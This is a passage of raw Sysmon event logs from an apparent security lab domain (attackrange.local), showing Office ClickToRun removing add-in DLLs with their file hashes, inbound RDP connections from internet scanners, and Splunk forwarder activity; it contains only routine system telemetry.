14:55:19.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power View Excel Add-in\Microsoft.PowerBI.AdomdClient.dllMD5=A9BC91BD4A5E895A70762E8D33B9BD43,SHA256=292D19DFAF15BBA16145DAA737ED042B823CB0CBF7795074AE6A1A785A3EF4F1,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068673Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power View Excel Add-in\BI-Report.pngMD5=9AF68D1242DE3941FE4C9D44016A4B76,SHA256=956BC5CB06CAD6196955B6D5DC34130BDEF297C328E44721F5970C81D266A4F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068672Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power View Excel Add-in\AdHocReportingExcelClient.dllMD5=EA21946F9FFC54D8D02565FB8FDE8CFE,SHA256=00FE64BFA2E5EED07F665EA4351AFA60464AFC3B70C7C444A3802F0106CE213E,IMPHASH=979BEFC3BB05CF4757078F414C0F80A3truetrue 23542300x800000000000000068671Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\WPFEXTENSIONS.DLLMD5=02147679AD8295AF68833A9A68E0E4D9,SHA256=774C11D95DEDBA3C480F4B2206BD0722CC74EB5877AD4132909E7D7E6EA1F1DB,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068670Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\VISUALIZATIONGRAPHICS.DLLMD5=0FB808E3AF26D9DFFAEDC1617912714D,SHA256=7EE233C2E088007D073CC1DC1D792D413D3C13F24C5EE720187CACE02557BDA7,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068669Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\VISUALIZATIONENGINE.DLLMD5=D0FA1FEEBCFD6BE615676095A63D420B,SHA256=5AE7059ECAF1359F578836175DE94F26C6C0A5AC91252D88632663A5E850BD43,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068668Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\VISUALIZATIONDIRECTX.DLLMD5=DEA1440DE574F282A9C2D4C71E980D72,SHA256=BB45E60C06B8FDCD16DEB8F43D14BE84A7E1109550C68625939D47D3D071C597,IMPHASH=5A635E6C3E075EC2523AEE48430E3FF8truetrue 23542300x800000000000000068667Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\VISUALIZATIONCONTROL.DLLMD5=983C6BB9858B0EB5966752892C5D8032,SHA256=585754191DBBE182ED38D3DA24E04894B660710B64B57CDAC0C7824531391400,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068666Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\VISUALIZATIONCOMMON.DLLMD5=62E5038C9F2C06F307CD4E7A6A8775A1,SHA256=8B6FEE05FA61E1DCF36424DDF8F3B1CBDC3BDFCDBD3F6EB67F21A86BFE4B1856,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068665Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\VISUALIZATIONCHARTCOMMON.DLLMD5=BE790BF0B6B65EF890ADFEE7510713CA,SHA256=EC079E3FBB50CE61051AF7B56F5B43AFD149449849AC404C36CD2EDBF0CA4176,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068664Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.580{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\VISUALIZATIONCHART.DLLMD5=987BAF7CB424FE615CDC336FB0098DEC,SHA256=1B4C437D752FABE22059D8C64D06FEEAF05D215B6C2D0DF9FD4145836EC8A2BD,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068663Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\POWERMAPCLASSIFICATION.DLLMD5=68372E0D801AC2734B8FEB29578C03CB,SHA256=BFC8012C7B8012FE944C0B941B6590304F51B7F336386792E07FD6CBF4ED437B,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068662Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\MICROSOFT.DATA.RECOMMENDATION.COMMON.DLLMD5=47D71BE5F9847C68FF640F4B8529650E,SHA256=B07B936E52506B4251C589898BD1FF7AC8C0ECED21493B356211D0F7F38FBEC9,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068661Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\MICROSOFT.DATA.RECOMMENDATION.CLIENT.CORE.DLLMD5=45645427AE0C1B69AE1AFB6BE5A32F46,SHA256=5D0F8F4854871B6596F884D214B3477BC22E0D581618118ACD9A6092B7F473F8,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068660Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\EXCELPLUGINSHELL.DLLMD5=D248F2306682DE8E0FD31C8CDEBB0E55,SHA256=7689F10E4EF1C9B4D0DCF8A5E393071121CCEE79AE5DD295F743FBCA54B2213E,IMPHASH=4D1F9D8D5668E472F90D255FF91E14F1truetrue 23542300x800000000000000068659Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\EXCELPLUGINDATAPROVIDER.DLLMD5=B8D9FB28510C9A4744E1E3A96AB9B5B5,SHA256=CB3BE933DE5BFDCE258E766E51CD9DBE402F40F37085329045722D6E2CBE8104,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068658Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\EXCELPLUGINCORE.DLLMD5=FAB833CA8080615B886FB90C06CE9B44,SHA256=1745E628497C485374B8C3861AE9F208F2D9211BAA59DEA82EB122395FA1949D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068657Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\DATATRANSFORMERWRAPPER.DLLMD5=8E105E5632D9540BEA0CC63C8B24AC27,SHA256=FAF3E5142D260FFEA6E3D05F8C22403F47A1D3B45AAE183FFC42CEF7B239FDFC,IMPHASH=EC47096C0EDE93118971098269DA778Ftruetrue 23542300x800000000000000068656Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\System.Web.Mvc.dllMD5=1AFDA3C6A92EEC2E2DFEFE5268A3D510,SHA256=7D0DF9050FF2F3F33749D08636783BA7F143852AA97E9933ED458CDCDD29FC56,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068655Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\System.Spatial.NetFX35.dllMD5=C8794189509F6A3C4F81850927A49D0B,SHA256=8E9B87318AC68BC9F54C78164D242F23216A99B201BA3A5B7BE7BF72103FFD2D,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068654Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\System.Collections.Immutable.dllMD5=F8C5CA3BDFECCDA92338B7D64E21508A,SHA256=A795EF03C8F09813D30916EFA5D6C007E22F04484C9CF4D370B706CB70AE672C,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068653Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\PRIVATE_ODBC32.dllMD5=65AEB3446D8C820EBE5FD06CF7A4127C,SHA256=A590146813999FA0D2E12EE077DDC17C4D5EA4F7D0804A9E12BE2CAB06D061F9,IMPHASH=AD88BC067D4C40BA828E149131AEF6E1truetrue 23542300x800000000000000068652Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\pdf2text.dllMD5=CA58A26333E7D519D6E7A80E90673463,SHA256=AE4A08A8203D052C85A56F3CC2645C94506CE029D5947A4B2F1690D66AE88269,IMPHASH=E9F1EFA82A42DD8B43FF10D20160E242truetrue 23542300x800000000000000068651Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Office.dllMD5=57FDD8BE6071DFC46128DCCAD5E25863,SHA256=0194C022C826D59407487096D208896A2465BA1A4C58EAC1D1AB96D9C2376A7E,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068650Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Newtonsoft.Json.dllMD5=F4A6BCC63E5A172A8FDCF612B9EB5705,SHA256=4CAC5BA11086954EFEE8033124913AEC5104A26009CE2DB52991525C78F73E7A,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068649Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Spatial.NetFX35.V7.dllMD5=4C5755F8D6F68F642A856B762773301B,SHA256=B6E21E6460DB9E413D6AE7B5C7E9B4A705A40F96486B8D8217AC6172D0CC192B,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068648Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Spatial.NetFX35.dllMD5=7D223FD25FD65D7435AF9408B3FBA464,SHA256=28F63BA107441BDE10AC1DCED58391734F1C35E0E48775F81DF4058314AC8F29,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068647Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.ProgramSynthesis.dllMD5=B187DE3173A9D7B5EE1DAD221E6983CA,SHA256=2F0B6D9765611166D3690A6A7E442AD793DE1F8D0E3673DE1E35A3C2A2392FEB,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068646Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Practices.Unity.dllMD5=FF9E69062D343B715828BD2F042509EC,SHA256=0BE3D405CB344C812B1BF390425734192321D1DC60FBBE82D75A54978D2477A5,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068645Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.PowerBI.AdomdClient.dllMD5=8EA06BC1D7C36A90D386A5062EF10E78,SHA256=B655B2F12F8D5E15C7DE0E9630D0CD4FE55EFCE4FB3D9D4493100D6294290D1E,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068644Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Office.Interop.Outlook.dllMD5=4FE822F8449B6200A553D35410957C5C,SHA256=C3B724AC88C6F7B1F71D7D036508B323798E6B4315EBCED980B8AA6A2CFE178C,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068643Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Office.Interop.Excel.dllMD5=BB94D9EDE1D92E30550D3C227DFE06C6,SHA256=2243BED9228FADF7BB05AB6A874A8F1A87B02BB0ECBF207A81A1DD1DD5287316,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068642Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.OData.Edm.NetFX35.V7.dllMD5=2C94316BF5402861777AE40C46FBD338,SHA256=260C841CB261133554D695DC02AF35C4347EB6DD584566D13A126AC1425F5C51,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068641Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.OData.Edm.NetFX35.dllMD5=DD5E538B58E1454CF2D96C76F6240CF4,SHA256=5A625EAB1FE91E8045B83143F115F530BD866C3D51960FD799E2219171A171C2,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068640Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.OData.Core.NetFX35.V7.dllMD5=0D138FB2466A668D3990B530F00BCB39,SHA256=09028C7463E0C3BEEE71344B4D94FDC9CEA9F66CB64D587EB626A6AA674854CA,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068639Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.OData.Core.NetFX35.dllMD5=A9CCA3E502400EBD87E4BD7C492AB112,SHA256=1C588CF5B604B676C01E39CD0319A1AA04E8CEEE47C827B36BCDBC3761B37746,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068638Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.MashupEngine.Library45.dllMD5=C6CC96A54E3F7E0EAF814C4FC473C362,SHA256=79453907BC6598AFCC7BBC7C5FDB608443FF0EDC099D903CA1100C8129413981,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068637Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.MashupEngine.dllMD5=3946EC3DA19132F4B33B3A75682AECA6,SHA256=0D2AD9B3CE087C493C3C048615D65B559AF656F4C86672051CCF2AEC576654EB,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 354300x800000000000000049744Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:17.810{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54367-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049743Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:17.248{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com57530-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049742Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:16.756{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com65255-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049741Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:19.799{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F19EFFFA0957BB8543F4D63792C1FE5C,SHA256=3FA5D16FBA44982A8388053F6DCC40E0EA30B33E4DCB78A6428D4C319EC02E05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049740Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:19.127{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D43882A26E798546A98E7313116A64C2,SHA256=BC560A54297A4328A47FC0CDA5C56789C6376754A8DCC2A885BA14EAB98DFFB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069085Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 